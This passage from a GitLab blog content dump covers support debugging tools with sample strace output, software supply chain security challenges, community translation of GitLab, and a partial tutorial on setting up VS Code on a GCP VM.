Linux.\n\nAn strace of a single-threaded program is linear, but following the threads of execution quickly gets difficult when there are many processes being captured. At GitLab Support we are typically tracing [Unicorn](https://bogomips.org/unicorn/) workers or [Gitaly](https://gitlab.com/gitlab-org/gitaly), which are highly concurrent, resulting in hundreds of process IDs being traced and hundreds of thousands of lines of output from traces only a few seconds long.\n\nWill built [strace parser](https://gitlab.com/gitlab-com/support/toolbox/strace-parser) for these types of use cases. Strace parser summarizes the most meaningful processing data delivered by an strace in a more accessible format, allowing users to find the critical section sections of the data quickly.\n\nThe next two examples are from a GitLab customer that was using a very slow file system to host their .gitconfig file, which was a major performance bottleneck. But it was not immediately clear what was happening from the perspective of a user trying to troubleshoot. By running an strace on Gitaly, we were able to get a better understanding of why the system was so slow.\n\n```\n3694  13:45:06.207369 clock_gettime(CLOCK_MONOTONIC, {3016230, 201254200}) = 0 \u003C0.000015>\n3694  13:45:06.207409 futex(0x7f645bb49664, FUTEX_WAIT_BITSET_PRIVATE, 192398, {3016230, 299906871}, ffffffff \u003Cunfinished ...>\n3542  13:45:06.209616 \u003C... futex resumed> ) = -1 ETIMEDOUT (Connection timed out) \u003C0.005236>\n3542  13:45:06.209639 futex(0x1084ff0, FUTEX_WAKE, 1) = 1 \u003C0.000023>\n3510  13:45:06.209673 \u003C... futex resumed> ) = 0 \u003C0.002909>\n3542  13:45:06.209701 futex(0xc420896548, FUTEX_WAKE, 1 \u003Cunfinished ...>\n3510  13:45:06.209710 pselect6(0, NULL, NULL, NULL, {0, 20000}, NULL \u003Cunfinished ...>\n16780 13:45:06.209740 \u003C... futex resumed> ) = 0 \u003C0.002984>\n3542  13:45:06.209749 \u003C... futex resumed> ) = 1 \u003C0.000043>\n16780 13:45:06.209776 pselect6(0, NULL, NULL, NULL, {0, 3000}, NULL \u003Cunfinished ...>\n3542  13:45:06.209787 futex(0xc420053548, FUTEX_WAKE, 1 \u003Cunfinished ...>\n16780 13:45:06.209839 \u003C... pselect6 resumed> ) = 0 (Timeout) \u003C0.000056>\n3544  13:45:06.209853 \u003C... futex resumed> ) = 0 \u003C0.003148>\n3542  13:45:06.209861 \u003C... futex resumed> ) = 1 \u003C0.000069>\n3510  13:45:06.209868 \u003C... pselect6 resumed> ) = 0 (Timeout) \u003C0.000151>\n3544  13:45:06.209915 epoll_ctl(4\u003Canon_inode:[eventpoll]>, EPOLL_CTL_DEL, 181\u003CUNIX:[164869291]>, 0xc42105bb14 \u003Cunfinished ...>\n16780 13:45:06.210076 write(1\u003Cpipe:[55447]>, \"time=\\\"2019-02-14T18:45:06Z\\\" level=warning msg=\\\"health check failed\\\" error=\\\"rpc error: code = DeadlineExceeded desc = context deadline exceeded\\\" worker.name=gitaly-ruby.4\\n\", 170 \u003Cunfinished ...>\n3544  13:45:06.210093 \u003C... epoll_ctl resumed> ) = 0 \u003C0.000053>\n3542  13:45:06.210101 futex(0x1089020, FUTEX_WAIT, 0, {0, 480025102} \u003Cunfinished ...>\n3510  13:45:06.210109 pselect6(0, NULL, NULL, NULL, {0, 20000}, NULL \u003Cunfinished ...>\n16780 13:45:06.210153 \u003C... write resumed> ) = 170 \u003C0.000064>\n3544  13:45:06.210163 close(181\u003CUNIX:[164869291]> \u003Cunfinished ...>\n```\n\nThis strace delivers more than 300,000 lines about the different Gitaly processes running on this customer’s GitLab environment, making it challenging to decipher the flow of execution.\n{: .note.text-center}\n\n“In this case, we can use strace-parser to say, ‘Just give me all the files that were opened, and sort them by how long it took to open,’” says Will.\n\n```\n$ strace-parser trace.txt files --sort duration\n\nFiles Opened\n\n      pid      dur (ms)       timestamp            error         file name\n  -------    ----------    ---------------    ---------------    ---------\n    24670      5203.999    13:45:16.152985           -           /efs/gitlab/home/.gitconfig\n    24859      5296.580    13:45:23.367482           -           /efs/gitlab/home/.gitconfig\n    24584      5279.810    13:45:09.286019           -           /efs/gitlab/home/.gitconfig\n    24666      5276.975    13:45:16.079697           -           /efs/gitlab/home/.gitconfig\n    24667      5255.649    13:45:16.101009           -           /efs/gitlab/home/.gitconfig\n    14871      2594.364    13:45:18.762347           -           /efs/gitlab/home/.gitconfig\n    24885      2440.635    13:45:26.224189           -           /efs/gitlab/home/.gitconfig\n    24886      2432.980    13:45:26.231009           -           /efs/gitlab/home/.gitconfig\n    24656        55.873    13:45:15.916836        ENOENT         /nfs/gitlab/gitdata/repositories/group/project.git/objects/info/alternates\n    24688        42.764    13:45:21.522789        ENOENT         /nfs/gitlab/gitdata/repositories/group/project.git/objects/info/alternates\n     3709        39.631    13:45:07.816618           -           /efs/gitlab/home/.gitconfig\n    24583        37.959    13:45:09.218283           -           /efs/gitlab/home/.gitconfig\n```\n\nBy summarizing the data in this way, we see multiple files that took 2-5 seconds to open, which is several orders of magnitude slower than expected.\n{: .note.text-center}\n\n“If it’s a particularly busy server and we’re performing these actions 50 times a second, 100 times a second, that adds up really fast,” says Will. “Strace-Parser lets you drill down quickly, and say, ‘OK, this specific thing we’re doing is super slow.’”\n\n### Get a closer look at processes using strace-parser\n\nStrace-Parser can also be used to drill down into details of a process.\n\nThe previous output showed PID 24670 is one of the slower processes, so we use the parser to understand how this slow call impacted the performance of the process overall.\n\n```\n$ strace-parser trace.txt pid 24670\n\nPID 24670\n\n  271 syscalls, active time: 5303.438ms, user time: 34.662ms, total time: 5338.100ms\n  start time: 13:45:16.116671    end time: 13:45:21.454771\n\n  syscall                 count    total (ms)      max (ms)      avg (ms)      min (ms)    errors\n  -----------------    --------    ----------    ----------    ----------    ----------    --------\n  open                       29      5223.073      5203.999       180.106         0.031    ENOENT: 9\n  read                       25        46.303        28.747         1.852         0.031\n  access                     11         6.948         4.131         0.632         0.056    ENOENT: 3\n  lstat                       6         5.116         2.130         0.853         0.077    ENOENT: 4\n  mmap                       32         3.868         0.485         0.121         0.028\n  openat                      2         3.757         2.934         1.878         0.823\n  fstat                      28         3.395         0.272         0.121         0.033\n  munmap                     11         2.551         0.929         0.232         0.056\n  rt_sigaction               59         2.548         0.121         0.043         0.024\n  close                      22         2.375         0.279         0.108         0.032\n  mprotect                   14         0.927         0.174         0.066         0.032\n  execve                      1         0.621         0.621         0.621         0.621\n  brk                         6         0.595         0.210         0.099         0.046\n  stat                        8         0.388         0.082         0.048         0.027    ENOENT: 3\n  getdents                    4         0.361         0.138         0.090         0.044\n  rt_sigprocmask              3         0.141         0.059         0.047         0.040\n  write                       1         0.101         0.101         0.101         0.101\n  dup2                        3         0.090         0.032         0.030         0.026\n  arch_prctl                  1         0.077         0.077         0.077         0.077\n  getrlimit                   1         0.062         0.062         0.062         0.062\n  getcwd                      1         0.044         0.044         0.044         0.044\n  set_robust_list             1         0.035         0.035         0.035         0.035\n  set_tid_address             1         0.032         0.032         0.032         0.032\n  setpgid                     1         0.030         0.030         0.030         0.030\n  ---------------\n\n  Program Executed: /opt/gitlab/embedded/bin/git\n  Args: [\"--git-dir\" \"/nfs/gitlab/gitdata/repositories/group/project.git\" \"cat-file\" \"--batch-check\"]\n\n  Parent PID:  3563\n\n  Slowest file open times for PID 24670:\n\n    dur (ms)       timestamp            error         file name\n  ----------    ---------------    ---------------    ---------\n    5203.999    13:45:16.152985           -           /efs/gitlab/home/.gitconfig\n       5.420    13:45:16.143520           -           /nfs/gitlab/gitdata/repositories/group/project.git/config\n       2.959    13:45:21.372776           -           /efs/gitlab/home/.gitconfig\n       2.934    13:45:21.401073           -           /nfs/gitlab/gitdata/repositories/group/project.git/refs/\n       2.736    13:45:21.417333        ENOENT         /nfs/gitlab/gitdata/repositories/group/project.git/info/grafts\n       2.683    13:45:21.421558           -           /nfs/gitlab/gitdata/repositories/group/project.git/objects/b7/ef5eba3a425af1e2a9cf6f51cb87454b6e1ad1\n       2.430    13:45:21.407170        ENOENT         /nfs/gitlab/gitdata/repositories/group/project.git/objects/info/alternates\n       0.992    13:45:21.420213        ENOENT         /nfs/gitlab/gitdata/repositories/group/project.git/shallow\n       0.823    13:45:21.405535           -           /nfs/gitlab/gitdata/repositories/group/project.git/objects/pack\n       0.275    13:45:21.380382           -           /nfs/gitlab/gitdata/repositories/group/project.git/config\n```\n\nThe output shows the time this process spent working was dominated by the slow file open. This data points the Support team in the right direction for fixing the underlying issue.\n{: .note.text-center}\n\nStrace itself has the `-c` flag which provides a similar summary, but its utility is limited when multiple processes are traced as it cannot break out per-process statistics.  Strace-Parser breaks these down to the PID level, and can also include the details of parent and child processes on demand.\n\n“In this case Will has identified an interesting area for our customer and then very quickly anchored it in the fact that when we look at that one spot it was slow,” says Lee. “When we’re debugging, having this data available really helps us pinpoint the problem for our customers so we can give them answers.”\n\nThe typical GitLab deployment has many different processes and services running at a time, which can create dozens of different child processes, so there is a large surface area for potential errors or slowness to occur.\n\nStrace-Parser is an open source, generic tool that anyone can use to better understand their strace data.\n\n## 2. [JSON Stats](https://gitlab.com/gitlab-com/support/toolbox/json_stats)\n\nWill also built [JSON Stats](https://gitlab.com/gitlab-com/support/toolbox/json_stats), a script that pulls performance statistics for different logs from the customer’s GitLab environment and summarizes the results in an easy-to-interpret table.\n\n```\nMETHOD                             COUNT     RPS     PERC99     PERC95     MEDIAN         MAX        MIN          SCORE    % FAIL\nFetchRemote                         2542    0.17  962176.08  130154.88   36580.23  4988513.00    1940.45  2445851585.19      1.06\nFindAllTags                         5200    0.34   30000.37   11538.63    1941.84    30006.23     252.10   156001924.68      1.63\nFindCommit                          3506    0.23   20859.98   16622.78   10841.86    30001.59    2528.67    73135073.75      0.23\nFindAllRemoteBranches               1664    0.11   20432.93   12996.75    8606.60   405503.94    1430.84    34000396.10      0.00\nAddRemote                           2603    0.17   10001.03    8094.97     825.46    10007.46     228.13    26032673.70      3.00\nFindLocalBranches                   2535    0.16   10004.68   10002.90    9051.91    10036.16    1260.89    25361871.05     34.32\n```\n\nThis output shows that we’re calling the “FindLocalBranches” service 2500+ times, and it’s failing 34% of the time.\n{: .note.text-center}\n\nThe Support team can use JSON Stats to ground their findings in evidence when evaluating overall performance for a customer. It's the same concept as strace-parser. Can we pivot the information in a way that it clearly becomes meaningful data?\n\n“It’s a quick way of extracting data that you can give to a customer. Instead of saying ‘Look, this failed once,’ we can say, ‘Look, this is failing a third of the time and that suggests there’s a problem with X,’” says Will.\n\nIn the sample output we see that JSON Stats is working with Gitaly logs, but the tool is nimble enough to work on the logs from all the heavy components of GitLab, including Rails, which runs the UI, and Sidekiq, which works on background tasks.\n\n“Some of our customers are very sophisticated and may have advanced monitoring that could give us this information. But we wanted to build a tool that would help us align and easily standardize on how we can get this performance information for customers that don’t have an advanced monitoring setup,” says Lee.\n\nWhile this specific tool isn't as helpful for people outside of the GitLab community, hopefully it helps to inspire others to consider how they are drawing conclusions, and how they can speed that process up.\n\n### Benchmarking with JSON Stats\n\nWill is building a future iteration of JSON Stats that will compare the performance of a customer’s GitLab instance with GitLab.com.\n\n![JSON benchmarking table](https://about.gitlab.com/images/blogimages/support-tools-update.png){: .shadow}\n\nBenchmarking the performance of GitLab.com (the first row) with the customer environment (second row), and the ratio between the two (third row). We can see that in the worst case, the customer’s 99th percentile FindCommit latency was almost eight times slower than it was on GitLab.com.\n{: .note.text-center}\n\n“Our vision here is to give accountability to our customers. We’re going to treat GitLab.com as the pinnacle experience for GitLab,” says Lee. “We want to use JSON Stats with benchmarking to help us understand how far away our customers are from GitLab.com.”\n\nLee and Will are still assessing how to set the target range for the customer’s instance of GitLab. But considering the wealth of resources allocated to GitLab.com, any self-managed customer that is performing within 5-10% of GitLab.com would be considered hugely successful.\n\n## 3. [GitLab SOS](https://gitlab.com/gitlab-com/support/toolbox/gitlabsos)\n\nWhen a customer encounters an issue, but they are unsure of what they problem is, they can run [GitLab SOS](https://gitlab.com/gitlab-com/support/toolbox/gitlabsos), created by support engineer [Cody West](/company/team/#codyww), to create a snapshot of different activities happening on their system. It's been so helpful in debugging GitLab that it's being added into our [Omnibus delivery](https://gitlab.com/gitlab-org/omnibus-gitlab/merge_requests/3430).\n\nBy capturing so much data about a moment in time during or shortly after encountering a problem, the support team is able to work asynchronously to troubleshoot on behalf of the customer.\n\n```\ncpuinfo              getenforce           iotop                netstat              opt                  sestatus             unicorn_stats\ndf_h                 gitlab_status        lscpu                netstat_i            pidstat              systemctl_unit_files uptime\ndmesg                gitlabsos.log        meminfo              nfsiostat            ps                   tainted              var\netc                  hostname             mount                nfsstat              sar_dev              ulimit               vmstat\nfree_m               iostat               mpstat               ntpq                 sar_tcp              uname\n```\n\nGitLab SOS works best if the script is run while an issue is occurring, or moments after, but even if the window of opportunity is missed you can still successfully gather information to diagnose the problem.\n{: .note.text-center}\n\n“If a customer is sharp, they may know what problems to look for already,” says Lee. “But if a customer is scared and they don’t know what to look for, then they can lean on a tool like GitLab SOS and learn from GitLab SOS. We even have some sharp customers that will generate the SOS output and begin to troubleshoot themselves because of the comprehensive overview it provides.”\n\n## These new tools drive data-driven decision-making in Support\n\nTools like strace-parser, JSON Stats, and GitLab SOS provide the Support team and GitLab customers with critical evidence about performance. By letting the data drive decision-making, the Support team is able to identify problems faster and quickly start debugging customer environments. Performance is a key feature of GitLab, and by filling our toolbox with data-driven solutions we can ensure greater [transparency](https://handbook.gitlab.com/handbook/values/#transparency) between GitLab and our customers.\n\nLearn more about debugging from a support engineering perspective in a GitLab Unfiltered video.\n\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/9W6QnpYewik\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\nCover photo by [Diogo Nunes](https://unsplash.com/@dialex?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on [Unsplash](https://unsplash.com/search/photos/tools?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText)\n{: .note}\n",[9,1099,803],{"slug":4965,"featured":6,"template":689},"three-new-support-tools","content:en-us:blog:three-new-support-tools.yml","Three New Support Tools","en-us/blog/three-new-support-tools.yml","en-us/blog/three-new-support-tools",{"_path":4971,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4972,"content":4978,"config":4984,"_id":4986,"_type":14,"title":4987,"_source":16,"_file":4988,"_stem":4989,"_extension":19},"/en-us/blog/top-challenges-to-securing-the-software-supply-chain",{"title":4973,"description":4974,"ogTitle":4973,"ogDescription":4974,"noIndex":6,"ogImage":4975,"ogUrl":4976,"ogSiteName":673,"ogType":674,"canonicalUrls":4976,"schema":4977},"Top challenges to securing the software supply chain","Learn what organizations should keep in mind while incorporating software supply chain security into their software development lifecycle.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668437/Blog/Hero%20Images/faster-cycle-times.jpg","https://about.gitlab.com/blog/top-challenges-to-securing-the-software-supply-chain","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Top challenges to securing the software supply chain\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Chandler Gibbons\"}],\n        \"datePublished\": \"2022-11-07\",\n      }",{"title":4973,"description":4974,"authors":4979,"heroImage":4975,"date":4981,"body":4982,"category":865,"tags":4983},[4980],"Chandler Gibbons","2022-11-07","\nOrganizations are feeling the pressure to integrate security into their software development lifecycles, and federal and industry mandates mean [the days of security as a “nice to have” are officially over](/blog/gitlabs-2022-global-devsecops-survey-security-is-the-top-concern-investment/). Understanding the threats that can emerge across the entire [software supply chain](/blog/gitlab-supply-chain-security/) is integral to this effort. But assembling a complete DevSecOps strategy that governs how code, applications, and infrastructure are protected across the software supply chain is no easy feat.\n\nWhat follows are a few of the biggest challenges that organizations should keep in mind while incorporating software supply chain security into their software development lifecycle.\n\n## The full attack surface is huge\nMost modern cloud-native applications are developed using a multitude of open source and third-party components, creating a tangle of direct and indirect dependencies. But vulnerabilities in open source software, such as the [Log4Shell vulnerability](https://www.cisa.gov/uscert/ncas/alerts/aa21-356a), are only one part of the software supply chain’s full attack surface.\n\nOther potential attack vectors include flaws in in-house code, misconfigured [CI/CD](/topics/ci-cd/) pipelines, secret information inadvertently committed to source code repositories, and even undiscovered vulnerabilities in web APIs. Recognizing all of the ways attackers can exploit the software supply chain is an overwhelming task — in fact, it’s impossible for teams to manually monitor all of these vectors, remediate the threats, and do their day jobs at the same time. DevSecOps teams should be aware of the broad categories of threats to watch out for and the tools and processes, such as version control, multi-factor authentication, and automated security scanning, that are effective at preventing or identifying attacks at each stage of the software supply chain.\n\n## Zero trust is easier said than done\nThe key to ensuring security during each step in the software supply chain is to enforce zero trust: essentially, scrutinizing everything and everyone, whether human, machine, open source component, or application configuration, for potential threats. IBM’s [Cost of a Data Breach 2022 report](https://www.ibm.com/reports/data-breach) found that investments in zero trust are paying off: Organizations that implemented zero trust saved nearly $1 million in average breach costs compared to organizations without zero trust. However, a majority of surveyed organizations had not yet deployed a zero trust security architecture, according to the report. It’s important to remember that [zero trust is not a single product or service](/blog/why-devops-and-zero-trust-go-together/) — it is a strategy applied to a security framework. For securing the software supply chain, that means enforcing zero trust principles at each step in the chain.\n\n## Launching a cyber attack is getting easier\nSoftware supply chain attacks were once the domain of experienced cybercriminals who had the skills to identify and exploit vulnerabilities or to build and inject malicious software code into applications. However, today’s cybercriminals have the benefit of learning from their predecessors. Once a piece of malicious software is out in the world, attackers can reuse and modify it for their own purposes. The [Mirai malware](https://www.csoonline.com/article/3258748/the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internet.html), for example, continues to live on even after its creators were caught and sentenced in 2018, with new variants emerging each year that continue to pose risks to vulnerable network devices. Today’s hackers also have a broader arsenal of [malicious tools](https://www.cisa.gov/uscert/ncas/alerts/AA18-284A) at their disposal, such as credential stealers and lateral movement tools, that make it easier than ever to launch software supply chain attacks.\n\n## Assess your organization’s threat landscape\nTaking steps to recognize threat vectors in the software supply chain ensures that the software development lifecycle remains an engine of innovation and drives benefits for the business, rather than being a potential backdoor for attackers.\n\n[Download our field guide](https://page.gitlab.com/resources-ebook-guide-to-threat-vectors.html) to better understand the types of threat vectors that can emerge at each stage of the software supply chain and how to mitigate those risks.\n",[865,9],{"slug":4985,"featured":6,"template":689},"top-challenges-to-securing-the-software-supply-chain","content:en-us:blog:top-challenges-to-securing-the-software-supply-chain.yml","Top Challenges To Securing The Software Supply Chain","en-us/blog/top-challenges-to-securing-the-software-supply-chain.yml","en-us/blog/top-challenges-to-securing-the-software-supply-chain",{"_path":4991,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4992,"content":4997,"config":5002,"_id":5004,"_type":14,"title":5005,"_source":16,"_file":5006,"_stem":5007,"_extension":19},"/en-us/blog/translating-gitlab",{"title":4993,"description":4994,"ogTitle":4993,"ogDescription":4994,"noIndex":6,"ogImage":1348,"ogUrl":4995,"ogSiteName":673,"ogType":674,"canonicalUrls":4995,"schema":4996},"Help us speak your language!","GitLab is available in many languages, but there's always more translation work to be done. Here's how you can contribute to translating GitLab.","https://about.gitlab.com/blog/translating-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Help us speak your language!\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-01-08\",\n      }",{"title":4993,"description":4994,"authors":4998,"heroImage":1348,"date":4999,"body":5000,"category":10,"tags":5001},[704],"2019-01-08","\nOne of the lesser-known features of GitLab is that it has been translated into many languages by community members. If you have only seen GitLab in (American) English, you can go to your [Profile page](https://gitlab.com/profile) and change your **Preferred language** to see it in another language.\n\n![Selecting preferred language](https://about.gitlab.com/images/blogimages/translation-blog/preferred_language_chinese.png){: .shadow.small.center}\n\n![GitLab in Chinese](https://about.gitlab.com/images/blogimages/translation-blog/gitlab_in_chinese.png){: .shadow.small.center}\n\nWe are proud of the work done by so many dedicated community members to help translate GitLab, but this is ongoing work, and we also have many languages that are just getting started with translation. That's where you come in!\n\n## Why translate GitLab?\n\nSome may say that GitLab is used by technical people who are already used to using a lot of different software in English, and translation is not really necessary. That may be true, but having the software available in local languages that people are more comfortable with lowers the barrier to entry not only for users, but for contributors too. Maybe it's because GitLab is an [all-remote company](/blog/the-case-for-all-remote-companies/) with [employees in nearly 50 countries](/company/team/), but GitLab team-members appreciate the benefits of localized software in local communities.\n\n## How is GitLab translated and how do I start contributing?\n\nThe translation is managed at [translate.gitlab.com](https://translate.gitlab.com/) using [Crowdin](https://crowdin.com/). First, a phrase (e.g. one that appears in the GitLab user interface or in error messages) needs to be internationalized before it can be translated. The internationalized phrases are then made available for translations on [translate.gitlab.com](https://translate.gitlab.com/). As each phrase is translated, it is added to the translation file, and will then be merged into future releases. You can find more details on how GitLab is translated in the [Translate GitLab documentation](https://docs.gitlab.com/ee/development/i18n/).\n\nAs you can see in the [translation activity stream](https://translate.gitlab.com/project/gitlab-ee/activity_stream), the majority of translations are contributed by community members. You're probably already familar with GitLab's motto, \"Everyone can contribute,\" and contributing translation is even easier than contributing code.  All you need is an account on [CrowdIn](https://crowdin.com/) plus a browser, and you are ready to translate GitLab to a language of your choice. So if you're looking for ways to contribute and know other languages, translation is a great place to get started.\n\nDuring the [GitLab Hackathon](/community/hackathon/) in September, one of our [Core Team](/community/core-team/) members [Hannes Rosenögger](https://gitlab.com/haynes) presented a session on translation where he walked through how community members can contribute. You can watch the recording:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/LJ9oSSx0qyY\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Where do we need help?\n\nAs you can see from the screenshot below, GitLab is almost fully translated into several languages, such as Chinese (both Simplifed and Traditional), French, German, Filipino, Brazilian Portuguese, Ukrainian, etc. However, many languages are in early stages, with a lot of translation left to be done and may also need [proofreaders](https://docs.gitlab.com/ee/development/i18n/proofreader.html) to help review and approve translations. You can find steps to becoming a proofreader also outlined in [the proofreader documentation](https://docs.gitlab.com/ee/development/i18n/proofreader.html#become-a-proofreader).\n\n![GitLab translation status](https://about.gitlab.com/images/blogimages/translation-blog/gitlab_translation_status.png){: .shadow.medium.center}\n\nEven if a language is fully translated today, new phrases are added all the time, so we welcome new contributors across all languages. If you have any questions as you get started on [translate.gitlab.com](https://translate.gitlab.com/), you can post questions on the [Crowdin discussions forum](https://translate.gitlab.com/project/gitlab-ee/discussions), and you are always welcome to reach me at rpaik@gitlab.com.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9,708],{"slug":5003,"featured":6,"template":689},"translating-gitlab","content:en-us:blog:translating-gitlab.yml","Translating Gitlab","en-us/blog/translating-gitlab.yml","en-us/blog/translating-gitlab",{"_path":5009,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":5010,"content":5015,"config":5021,"_id":5023,"_type":14,"title":5024,"_source":16,"_file":5025,"_stem":5026,"_extension":19},"/en-us/blog/tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access",{"title":5011,"description":5012,"ogTitle":5011,"ogDescription":5012,"noIndex":6,"ogImage":2342,"ogUrl":5013,"ogSiteName":673,"ogType":674,"canonicalUrls":5013,"schema":5014},"Tutorial: Install VS Code on a cloud provider VM and set up remote access","Learn how to automate the installation of VS Code on a VM running on a cloud provider and how to access it from your local laptop.","https://about.gitlab.com/blog/tutorial-install-vs-code-on-a-cloud-provider-vm-and-set-up-remote-access","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Tutorial: Install VS Code on a cloud provider VM and set up remote access\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Cesar Saavedra\"}],\n        \"datePublished\": \"2024-05-06\",\n      }",{"title":5011,"description":5012,"authors":5016,"heroImage":2342,"date":5018,"body":5019,"category":801,"tags":5020},[5017],"Cesar Saavedra","2024-05-06","DevSecOps teams can sometimes find they need to run an instance of Visual Studio Code (VS Code) remotely for team members to share when they don't have enough local resources. However, installing, running, and using VS Code on a remote virtual machine (VM) via a cloud provider can be a complex process full of pitfalls and false starts. This tutorial covers how to automate the installation of VS Code on a VM running on a cloud provider.\n\nThis approach involves two separate GitLab projects, each with its own pipeline. The first one uses Terraform to instantiate a virtual machine in GCP running Linux Debian. The second one installs VS Code on the newly instantiated VM. Lastly, we provide a procedure on how to set up your local Mac laptop to connect and use the VS Code instance installed on the remote VM.\n\n## Create a Debian Linux distribution VM on GCP\n\nHere are the steps to create a Debian Linux distribution VM on GCP.\n\n### Prerequisites\n\n1. A GCP account. If you don't have one, please [create one](https://cloud.google.com/free?hl=en).\n2. A GitLab account on [gitlab.com](https://gitlab.com/users/sign_in)\n\n**Note:** This installation uses:\n\n- Debian 5.10.205-2 (2023-12-31) x86_64 GNU/Linux, a.k.a Debian 11\n\n### Create a service account and download its key\n\nBefore you create the first GitLab project, you need to create a service account in GCP and then generate and download a key. You will need this key so that your GitLab pipelines can communicate to GCP and the GitLab API.\n\n1. To authenticate GCP with GitLab, sign in to your GCP account and create a [GCP service account](https://cloud.google.com/docs/authentication#service-accounts) with the following roles:\n- `Compute Network Admin`\n- `Compute Admin`\n- `Service Account User`\n- `Service Account Admin`\n- `Security Admin`\n\n3. Download the JSON file with the service account key you created in the previous step.\n4. On your computer, encode the JSON file to `base64` (replace `/path/to/sa-key.json` to the path where your key is located):\n\n   ```shell\n   base64 -i /path/to/sa-key.json | tr -d \\\\n\n   ```\n\n**NOTE:** Save the output of this command. You will use it later as the value for the `BASE64_GOOGLE_CREDENTIALS` environment variable.\n\n### Configure your GitLab project\n\nNext, you need to create and configure the first GitLab project.\n\n1. Create a group in your GitLab workspace and name it `gcpvmlinuxvscode`.\n\n1. Inside your newly created group, clone the following project:\n\n   ```shell\n   git@gitlab.com:tech-marketing/sandbox/gcpvmlinuxvscode/gcpvmlnxsetup.git\n   ```\n\n1. Drill into your newly cloned project, `gcpvmlnxsetup`, and set up the following CI/CD variables to configure it:\n   1. On the left sidebar, select **Settings > CI/CD**.\n   1. Expand **Variables**.\n   1. Set the variable `BASE64_GOOGLE_CREDENTIALS` to the `base64` encoded JSON file you created in the previous section.\n   1. Set the variable `TF_VAR_gcp_project` to your GCP `project` ID.\n   1. Set the variable `TF_VAR_gcp_region` to your GCP `region` ID, e.g. us-east1, which is also its default value.\n   1. Set the variable `TF_VAR_gcp_zone` to your GCP `zone` ID, e.g. us-east1-d, which is also its default value.\n   1. Set the variable `TF_VAR_machine_type` to the GCP `machine type` ID, e.g. e2-standard-2, which is also its default value.\n   1. Set the variable `TF_VAR_gcp_vmname` to the GCP `vm name` you want to give the VM, e.g. my-test-vm, which is also its default value.\n\n**Note:** We have followed a minimalist approach to set up this VM. If you would like to customize the VM further, please refer to the [Google Terraform provider](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) and the [Google Compute Instance Terraform provider](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/compute_instance) documentation for additional resource options.\n\n### Provision your VM\n\nAfter configuring your project, manually trigger the provisioning of your VM as follows:\n\n1. On the left sidebar, go to **Build > Pipelines**.\n1. Next to **Play** (**{play}**), select the dropdown list icon (**{chevron-lg-down}**).\n1. Select **Deploy** to manually trigger the deployment job.\n\nWhen the pipeline finishes successfully, you can see your new VM on GCP:\n\n- Check it on your [GCP console's VM instances list](https://console.cloud.google.com/compute/instances).\n\n### Remove the VM\n\n**Important note:** Only run the cleanup job when you no longer need the GCP VM and/or the VS Code that you installed in it.\n\nA manual cleanup job is included in your pipeline by default. To remove all created resources:\n\n1. On the left sidebar, select **Build > Pipelines** and select the most recent pipeline.\n1. For the `destroy` job, select **Play** (**{play}**).\n\n## Install and set up VS Code on a GCP VM\n\nPerform the steps in this section only after you have successfully finished the previous sections above. In this section, you will create the second GitLab project that will install VS Code and its dependencies on the running VM on GCP.\n\n### Prerequisites\n\n1. A provisioned GCP VM. We covered this in the previous sections.\n\n**Note:** This installation uses:\n\n- VS Code Version 1.85.2\n\n### Configure your project\n\n**Note:** Since you will be using the `ssh` command multiple times on your laptop, we strongly suggest that you make a backup copy of your laptop local directory `$HOME/.ssh` before continuing.\n\nNext, you need to create and configure the second GitLab project.\n\n1. Head over to your GitLab group `gcpvmlinuxvscode`, which you created at the beginning of this post.\n\n1. Inside group, `gcpvmlinuxvscode`, clone the following project:\n\n   ```shell\n   git@gitlab.com:tech-marketing/sandbox/gcpvmlinuxvscode/vscvmsetup.git\n   ```\n\n1. Drill into your newly cloned project, `vscvmsetup` and set up the following CI/CD variables to configure it:\n   1. On the left sidebar, select **Settings > CI/CD**.\n   1. Expand **Variables**.\n   1. Set the variable `BASE64_GOOGLE_CREDENTIALS` to the `base64` encoded JSON file you created in project `gcpvmlnxvsc`. You can copy this value from the variable with the same name in project `gcpvmlnxvsc`.\n   1. Set the variable `gcp_project` to your GCP `project` ID.\n   1. Set the variable `gcp_vmname` to your GCP `region` ID, e.g. us-east1.\n   1. Set the variable `gcp_zone` to your GCP `zone` ID, e.g. us-east1-d.\n   1. Set the variable `vm_pwd` to the password that you will use to ssh to the VM.\n   1. Set the variable `gcp_vm_username` to the first portion (before the \"@\" sign) of the email associated to your GCP account, which should be your GitLab email.\n\n### Run the project pipeline\n\nAfter configuring the second GitLab project, manually trigger the provisioning of VS Code and its dependencies to the GCP VM as follows:\n\n1. On the left sidebar, select **Build > Pipelines** and click on the button **Run Pipeline**. On the next screen, click on the button **Run pipeline**.\n\n    The pipeline will:\n\n    - install `xauth` on the virtual machine. This is needed for effective X11 communication between your local desktop and the VM \n    - install `git` on the VM\n    - install `Visual Studio Code` on the VM.\n\n2. At this point, you can wait until the pipeline successfully completes. If you don't want to wait, you can continue to do the first step of the next section. However, you must ensure the pipeline has 